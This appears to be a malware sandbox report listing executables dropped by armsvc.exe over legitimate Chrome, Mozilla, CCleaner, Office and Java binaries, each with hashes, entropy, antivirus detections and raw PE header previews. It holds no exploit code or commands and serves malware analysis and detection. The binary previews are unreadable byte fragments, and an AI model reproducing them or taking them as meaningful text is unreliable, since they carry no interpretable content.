                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...V.+d..........................................@..................................l......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2294272
                                                                                                                                                                Entropy (8bit):7.039446570157768
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:u3wR2xs4r4VMm9qRzzFbju+Gb2PJsWT12ngFIDRRAubt5M:t24dqRzgOJ2gUf
                                                                                                                                                                MD5:81F69B7ADB54A4B19582226700CDDA63
                                                                                                                                                                SHA1:79DEB0372C368D50A3498837E0C5674B21708041
                                                                                                                                                                SHA-256:96F391751ACCE5B40792E088A8221C0333463286672B7B70B88F6AB47E72F40B
                                                                                                                                                                SHA-512:06085437BF1793DCB553461E11AEF32645A4A44C923F8660C6ADE5D40F0DBBEBBD079D7A8384D4181C5D4CBDC81835CF28591A6A273A3A731A4D5B97AF959DD8
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...w..c.........."..........F.................@.............................P$.......#... ..........................................U..Z...rU.......0..........D....................C.......................B..(.......8............]...............................text............................... ..`.rdata...5.......6..................@..@.data........0......................@....pdata..D...........................@..@.00cfg..(...........................@..@.gxfg....).......*..................@..@.retplnel................................tls................................@....voltbl.F..............................._RDATA....... ......................@..@.rsrc........0......................@..@.reloc.......P......................@...........................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\logs\logECFE.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2257
                                                                                                                                                                Entropy (8bit):4.574646680658393
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:mHAfECJTkRK1mtKiJqLXJkqI6v3BqMdJ/Jd2enyD:wAfECJTkFKiJqLWk3oMdJ/Jd25
                                                                                                                                                                MD5:F39DBD2946034C065D2E560FE4ED6BAC
                                                                                                                                                                SHA1:B0FA999C3C2EDA0FFEDEBCB60F25A1965B1DD9CE
                                                                                                                                                                SHA-256:BEAE30D4E7E25EFFB24E1B2EEA0593489FF5C1A815C8CF673249E055F54FA497
                                                                                                                                                                SHA-512:CB62DDC4CB456B6DFF4B3EBE4C50DBEEA47C8A127C0DE1250E2EA41C1EAACAFB2CB47B9E605A69B9FC6F83839CB00CE4EA86F08CE133638BABCE408A44D728D5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...Disabled unneeded token privilege: SeAuditPrivilege...Disabled unneeded token privilege: SeBackupPrivilege...Disabled unneeded token privilege: SeCreateGlobalPrivilege...Disabled unneeded token privilege: SeCreatePagefilePrivilege...Disabled unneeded token privilege: SeCreatePermanentPrivilege...Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..Disabled unneeded token privilege: SeDebugPrivilege...Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..Disabled unneeded token privilege: SeImpersonatePrivilege...Disabled unneeded token privilege: SeIncreaseBasePriorityPrivilege...Disabled unneeded token privilege: SeIncreaseQuotaPrivilege...Disabled unneeded token privilege: SeIncreaseWorkingSetPrivilege...Disabled unneeded token privilege: SeLoadDriverPrivilege...Disabled unneeded token privilege: SeLockMemory

                                                                                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2257
                                                                                                                                                                Entropy (8bit):4.574646680658393
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:mHAfECJTkRK1mtKiJqLXJkqI6v3BqMdJ/Jd2enyD:wAfECJTkFKiJqLWk3oMdJ/Jd25
                                                                                                                                                                MD5:F39DBD2946034C065D2E560FE4ED6BAC
                                                                                                                                                                SHA1:B0FA999C3C2EDA0FFEDEBCB60F25A1965B1DD9CE
                                                                                                                                                                SHA-256:BEAE30D4E7E25EFFB24E1B2EEA0593489FF5C1A815C8CF673249E055F54FA497
                                                                                                                                                                SHA-512:CB62DDC4CB456B6DFF4B3EBE4C50DBEEA47C8A127C0DE1250E2EA41C1EAACAFB2CB47B9E605A69B9FC6F83839CB00CE4EA86F08CE133638BABCE408A44D728D5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...Disabled unneeded token privilege: SeAuditPrivilege...Disabled unneeded token privilege: SeBackupPrivilege...Disabled unneeded token privilege: SeCreateGlobalPrivilege...Disabled unneeded token privilege: SeCreatePagefilePrivilege...Disabled unneeded token privilege: SeCreatePermanentPrivilege...Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..Disabled unneeded token privilege: SeDebugPrivilege...Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..Disabled unneeded token privilege: SeImpersonatePrivilege...Disabled unneeded token privilege: SeIncreaseBasePriorityPrivilege...Disabled unneeded token privilege: SeIncreaseQuotaPrivilege...Disabled unneeded token privilege: SeIncreaseWorkingSetPrivilege...Disabled unneeded token privilege: SeLoadDriverPrivilege...Disabled unneeded token privilege: SeLockMemory

                                                                                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1661952
                                                                                                                                                                Entropy (8bit):4.349536196253639
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:pwLZrVqVg9N9JMlDlfjRiVuVsWt5MJMs:C9rIgFIDRRAubt5M
                                                                                                                                                                MD5:CC9BE47A84D7EB73D78181F087D654DC
                                                                                                                                                                SHA1:6075C247BF5C764A7F82B717F224866B828DF6DB
                                                                                                                                                                SHA-256:87E6CFD6BD4BC73BA9E686DB6E43AF6AEA4CDC7C6340828360B61ECB445EDD63
                                                                                                                                                                SHA-512:BE9BE38E7272AA51E7D012B1500C003104506C2D8E0672165C48091050CC7D82A8CFFA18E23FDED34514C529738757C93D1ED275D589D2E5991BC9B9BC847C28
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...Y...Y...Y.......Y......cY.......Y..u.H..Y.......Y.......Y.......Y.......Y...Y..ZY..~....Y..y.p..Y..~....Y..Rich.Y..................PE..L...aw.X.........."..................O............@.........................................................................L[.......................................P..T...........................hP..@............................................text............................... ..`.rdata..............................@..@.data...P....p.......X..............@....gfids...............b..............@..@.rsrc................d..............@..@.reloc...............l..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\CCleaner\CCleaner.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):7916544
                                                                                                                                                                Entropy (8bit):6.808800946972303
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:o4XzU6N8DGpG+HIIbaATLQOzgA2YcwTPujzFPGctXLcMpiYUf:vWmG+onAtkJYrTG3x9rUf
                                                                                                                                                                MD5:ADFFCA97437F33E304EDA77C317E5AB5
                                                                                                                                                                SHA1:B5BB54BE8E9B3DFC99AEA73FD1867C6BB0BB29F7
                                                                                                                                                                SHA-256:EF226CFB32CB970022BE8906DBA10AB5AC88C2A89B7C20509954E5F9BD3E7641
                                                                                                                                                                SHA-512:43E71C5A6321805196180E09D4F464E0F227CB5E743E30CDA20E386B4EF14E85B1053B2744D75A69E80F730CA8F81ECB9CA754BB87FC686903E50F1D2BAC0C06
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.........."...q...q...q.bgq...q.beqx..q.bdq...q...p...qk..p...q...p...q\..p...q...p...q..p...q..p...q..p...q...qg..q,..p...q+..p...q+.iq...q...q...q,..p...qRich...q................PE..L...j..X..................0..(`.............. 0...@..........................P.......My.....................................X.>.......d...'.........................0k6.T....................k6.....0c0.@............ 0.......>.`....................text.....0.......0................. ..`.rdata..$.... 0.......0.............@..@.data.....%...>..`....>.............@....gfids........d......0D.............@..@.tls..........d......:D.............@....rsrc.....'...d...'..<D.............@..@.reloc...............,l.............@...........................................................................................................................................................................

                                                                                                                                                                C:\Program Files\CCleaner\CCleaner64.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):9932288
                                                                                                                                                                Entropy (8bit):6.573768136064191
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:x8KDFDVEj6anCFaSnouaILckYPujzFPGctXLcMMUf:x7DVy6TaSnokIkYG3x9kUf
                                                                                                                                                                MD5:91AA31DB7CC4AB3BB8D7ACABA6FF8B3B
                                                                                                                                                                SHA1:B7DE59619FDFF119F0B276C4711F64A1C1245CBE
                                                                                                                                                                SHA-256:CACFD2EF0A7AF7DAE8E7E1A7EA05E4560C5852E501B5C6B39BDBAADCB88EC361
                                                                                                                                                                SHA-512:870DD6B0E9D2DE4B88843DCADCBDABE94B88BAEA71BEF348970080191C9E069D50D6692F3D5468A7B59A79C2C2876B472F924BA9F761914D682774D9EB1121FC
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......#.cg..0g..0g..0...0k..0...0...0...0}..0\..1o..0...1n..0\..1O..0...1d..0...1f..0\..1 ..0...1i..0...1e..0...1|..0g..0...0...1f..0...1...0...0f..0g.y0b..0...1f..0Richg..0........PE..d......X..........".......B...l................@.............................@......m..... .................................................0.\...........'..0..,4...................eL.T...................HfL.(... .B..............0B.h...P.\.`....................text...W.B.......B................. ..`.rdata.......0B.......B.............@..@.data...0+&...].......\.............@....pdata..,4...0...6....b.............@..@.gfids.......p........e.............@..@.tls..................e.............@....rsrc.....'.......'...e.............@..@.reloc.............................@...................................................................................................................

                                                                                                                                                                C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1666048
                                                                                                                                                                Entropy (8bit):4.323754583224004
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:1jrNF/ZXGtFBV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:1FGX7Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:C92655B3FDD91A5FD88170CF4442DBF9
                                                                                                                                                                SHA1:261AA4A4558256AB49546498A4D1117BAE2B66AF
                                                                                                                                                                SHA-256:F57A2BDB30EEC7212D9D0B953D1DEF3849C404F89231A6953AF1FBF3920515CA
                                                                                                                                                                SHA-512:F546C5A9A8CC6877EBDC4C3DCDDEAC13E15B8BF124B78851A9ACABEA23C008B95B558B172F5C5E098F8D27767A1639F57C37A09E8034C57CD35DB357BADCD3C2
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v.<...o...o...o...o...o...o...o...oF..o.o.o...o.o.o...o.o.o...o.o.o...o.o.o...oRich...o........................PE..d...OUIK..........".................hC.........@............................................................................................=..........0...........................`...8............................................................................text............................... ..`.rdata...e.......f..................@..@.data....9...p.......V..............@....pdata...............l..............@..@.rsrc...0...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\jabswitch.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1526784
                                                                                                                                                                Entropy (8bit):4.025018462466428
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:MvV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:iVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:FE585477CBB9E34A740E545F66A4F0A5
                                                                                                                                                                SHA1:88BFCB7ADE3E8CCE2A1DA0BB9090EDEA57FB160F
                                                                                                                                                                SHA-256:6449D7370713A74A0CE27A12EFD7C7F3B81DC553B24EEAE8F47194A05FBB0122
                                                                                                                                                                SHA-512:0029CC628B24227430EA67446DBEA0D90DB580CB1CE09E9641FFBC2E859BFAC7323E8500A3512B3194E097CD8FB5A37252E6D63D755ED58C3DED873E21F9BA63
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..................................................................Rich...................PE..d....]OX.........."......,...>.......-.........@....................................jk.......................................................a..x....................................C...............................................@...............................text...B+.......,.................. ..`.rdata...*...@...,...0..............@..@.data...h....p.......\..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc...............l..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\java-rmi.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508352
                                                                                                                                                                Entropy (8bit):4.000673470590711
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:S1V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:S3Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:40BC613D8E346E2EDABBCE76676211BD
                                                                                                                                                                SHA1:98D53C9B5B6FCEC98202D3D48D2A2A4A8E37AF89
                                                                                                                                                                SHA-256:4EF3C29A688FAC360436FE2A35B44A9A685D8B93003016437E00DBE4A6E9941E
                                                                                                                                                                SHA-512:E8399F116E559CDE3215568441EDA00072A1C663278D632F421D6E932D3100FDB15CCFBF0D89CF435316E22A8443B06B2799D9B3689ED7732B1ACB0074312267
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX..........".................$..........@.............................P......D........................................................#..P....P..\....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...\....P......................@..@.reloc.......`.......$..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\java.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1698304
                                                                                                                                                                Entropy (8bit):4.4015136125452985
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:VSTPHT1DIVg9N9JMlDlfjRiVuVsWt5MJMs:VST/TugFIDRRAubt5M
                                                                                                                                                                MD5:F939C3E0236CD9F43A7CB1D2392C4840
                                                                                                                                                                SHA1:83EC834FAC5DFBF3459972DF8F98A1488E59E192
                                                                                                                                                                SHA-256:8BECF4E10EECDA77A40C7983CE84CD28216612CFA1DCBA2787FC2A29E39702DA
                                                                                                                                                                SHA-512:144626AB280AF55011C7979CAE7BB941D13C0B1A08500B9B3C02C0EB359617F20F94B1B1A70E27AFB4147133DFE49291CD3448D67273058D1D55CBB9DFD2EF57
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#.q.p.q.p.q.p<?"p.q.p...p.q.p..$p.q.p..)p.q.p.q.p.q.p...p.q.p.. p.q.p..'p.q.pRich.q.p........................PE..d...~]OX.........."..........B.................@.............................P...............................................................]..d...............H.......................................................................X............................text...A........................... ..`.rdata..............................@..@.data....?...p.......X..............@....pdata..H............t..............@..@.rsrc...............................@..@.reloc.......`......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\javacpl.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1572352
                                                                                                                                                                Entropy (8bit):4.123695335889213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:93Kan/lPv0V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:9xIVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:D2E1B6C2EF2481029B91BEE01A0CD5D3
                                                                                                                                                                SHA1:068069D1414CE0534892A1E9AC57EB1E6942135E
                                                                                                                                                                SHA-256:2BB6A3B224A64945336B8438A30F0296C83803722413B420A5B65E960DFF7C82
                                                                                                                                                                SHA-512:7D2A7CF1F07CB549A4233B4C18CD11DC58CCF70FE4F39A1A02AD2891A1B1B1630E530518FCE75300A005720C0FFC54003CDB93BF107C3C05BBC8FFFDFE8E7A8B
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$#..`B..`B..`B..{.f.bB....b.aB..{.d.bB..{.P.sB..i:i.iB..`B...B...4Q.hB..{.Q.gB..{.`.aB..{.g.aB..Rich`B..........PE..d....`OX.........."......Z..........tW.........@.............................P......V|..........................................................x....................................s...............................................p...............................text....X.......Z.................. ..`.rdata...5...p...6...^..............@..@.data...x...........................@....pdata..............................@..@.rsrc...............................@..@.reloc.......`......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\javaw.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1698304
                                                                                                                                                                Entropy (8bit):4.402152910472849
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:9Hj8YsTuDDVg9N9JMlDlfjRiVuVsWt5MJMs:9HjnsTqgFIDRRAubt5M
                                                                                                                                                                MD5:38C3EA7CA99603488FF1135A3AD5A322
                                                                                                                                                                SHA1:E096D791DA71FB02AACB69020F57BEAA15911C9E
                                                                                                                                                                SHA-256:A8759062DB121B8A01412A459092815215E9237B71F4EADC57E02D038DA8E171
                                                                                                                                                                SHA-512:D2A853FACE32BF1E3EFBAE4A2FD00DC35DE1250960E8E58B2F656AEBCA42254B0495FB4EFE754A5CF5459D6F5B87214ED3A9AD27E18D4248530D38743D6AFB6D
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o."..eq..eq..eqY@.q..eq..q..eq..q..eq.v.q..eq..dq..eq..qk.eq..q..eq..q..eqRich..eq........PE..d...~]OX.........."..........B.................@.............................P.......r.......................................................]..d...............T.......................................................................X............................text............................... ..`.rdata..............................@..@.data....?...p.......X..............@....pdata..T............t..............@..@.rsrc...............................@..@.reloc.......`......................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\javaws.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1808384
                                                                                                                                                                Entropy (8bit):4.520083463391029
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:nRjdh53Kv0Vg9N9JMlDlfjRiVuVsWt5MJMs:RjdJgFIDRRAubt5M
                                                                                                                                                                MD5:285E161404B75971AFD7D6F25DABC055
                                                                                                                                                                SHA1:790AB56A1F2335D54CA4DBF748689A2653481FB1
                                                                                                                                                                SHA-256:919B17F5C7E011EBFDBFA91BD701E46CA790A5DB3D82E6AF009099209E48C361
                                                                                                                                                                SHA-512:A2D254519BCD2D132A014997B66F335EAF735FE273331EDF0ACB9B5F04F2A0A4AB2514AF8D9B4642DEE55843FA437946792A876C1B4F2D29ADA14BB1F7215827
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q.............6A.......t.......L..............6u.D....6t......6E......6B.....Rich....................PE..d...d_OX.........."..........L.................@.............................`......_..........................................................x...............| ..................`....................................................... ........................text...>........................... ..`.rdata.............................@..@.data...h...........................@....pdata..| ......."..................@..@.rsrc................6..............@..@.reloc.......p......................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\jjs.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508352
                                                                                                                                                                Entropy (8bit):4.0011061130382135
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:oBV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:o7Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:B47E8DD138D3F9F963BF9D8D3C02ED65
                                                                                                                                                                SHA1:110FF59A9857A4D98E14FF48F59EA9EAEF05C5E9
                                                                                                                                                                SHA-256:1A957A8ABA5780DCFF7B13C64CC2AFBA44CBB2D6253C2E443BD7A117E1DAAD79
                                                                                                                                                                SHA-512:33031C4748F46E2437BE606E9ADBC72335C31B5EF19751E65DDE27CF3B97AF33369DA2B6DF6CF1DA8419A540E5472B114382D2C4B55CEEAE4F7E93467BB1F3FC
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P......>........................................................#..P....P..@....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...@....P......................@..@.reloc.......`.......$..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\jp2launcher.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1603584
                                                                                                                                                                Entropy (8bit):4.197235556558599
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:433JWHkdceKV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:kVdceyVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:178FF05867F6E6FCC71739F5D8DDB4A4
                                                                                                                                                                SHA1:1EFD0B97055B6CD9C1AF6400A09CA39C78C2AF3E
                                                                                                                                                                SHA-256:FE490E13F733B8E0D641517F85D30B391D237D22784D07CA4CD18852027A8E86
                                                                                                                                                                SHA-512:4D29B5F11BCE2033D6150A26A89E8A8D46009DB85DCD2468206EE94C4C916B6BA7F4FC7EE9E20D6623379BBFE5BC34B7FA86083F1C379B3C85E91ADC0DFDF0FE
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........IJ..($..($..($..P...($....($.df...($....($..(%.N($.^...($....($....($....($....($.Rich.($.........PE..d...._OX..........".................|..........@.....................................n...................................................... k..x.......H.......`...................P........................................................f.......................text...~........................... ..`.rdata..rj.......l..................@..@.data....6...........j..............@....pdata..`...........................@..@.rsrc...H...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\keytool.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):4.00001643378742
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:CvV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:CdVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:E96F4F693FACFDF5FA9812C3D43D94FD
                                                                                                                                                                SHA1:DE3A1DF108F45018454E02BDAE24257CADE22576
                                                                                                                                                                SHA-256:7BB182BCB86614B32E6CB5F9B075821925F688A8BC70EF025FD2CE7BB2608FCA
                                                                                                                                                                SHA-512:86B0C13BEBA84E2697D45FDC8AC9EBBA21EBE165E47D5AC33FE3A091A3177C2067CC0259DC8365B449B007F925C02A33254640ACD29FE043DC0D0A6E6094067F
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P......<........................................................#..P....P..T....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...T....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\kinit.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):4.000052478632848
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:2fV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:2tVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:3B0B1EAE4B6A689CA6A3FB65853C6AE7
                                                                                                                                                                SHA1:60FE0BBC3315A09C8CB8F7353A413EFB25B8DB0A
                                                                                                                                                                SHA-256:0ABF8240EC4EA32A16111DAC0203F1712F13238A9D7F2E39C0339C3B40C24227
                                                                                                                                                                SHA-512:6856D50E3097B70FE4C3DED851177D3C37345A50654C9B62635E7EA2E7F29183F8373FE2BDC53ABAF8203523968755F119E8E73C13F5946C05657787F57A9CF9
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A3.. ].. ].. ]..X... ]..... ]..... ].. \.. ]..... ]..... ]..... ].Rich. ].........................PE..d....]OX.........."............................@.............................P.......j.......................................................#..P....P..H....@.......................!............................................... ..P............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...H....P......................@..@.reloc.......`.......&..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files\Java\jre1.8.0_121\bin\klist.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):4.000050858099175
